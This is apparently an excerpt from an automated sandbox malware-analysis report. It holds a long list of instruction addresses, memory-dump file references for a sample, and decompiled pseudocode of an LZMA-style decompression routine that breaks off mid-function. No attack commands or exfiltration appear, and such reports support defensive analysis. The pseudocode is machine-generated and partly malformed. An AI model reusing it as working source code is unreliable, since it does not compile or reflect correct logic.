                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x004071dc
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x004071f4
                                                          0x004071f8
                                                          0x004071f8
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00407038
                                                          0x00407038
                                                          0x0040703e
                                                          0x0040703e
                                                          0x004067da
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x004069bf
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407044
                                                          0x0040703e
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x0040703e
                                                          0x00406fc5
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406d17

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                          • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                          • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                          • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406C5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
